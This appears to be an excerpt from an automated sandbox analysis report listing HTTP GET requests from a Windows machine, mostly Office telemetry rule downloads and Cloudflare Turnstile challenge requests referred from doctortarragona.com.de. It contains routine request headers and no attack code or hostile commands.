Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H2D+HCngALeUZfR&MD=mAexEuHX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: doctortarragona.com.deConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://doctortarragona.com.de/N12Pv/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=0mfnhep7j7q3smgp3fqq79762i
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://doctortarragona.com.de/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7cae957e10e556&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7cae957e10e556&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
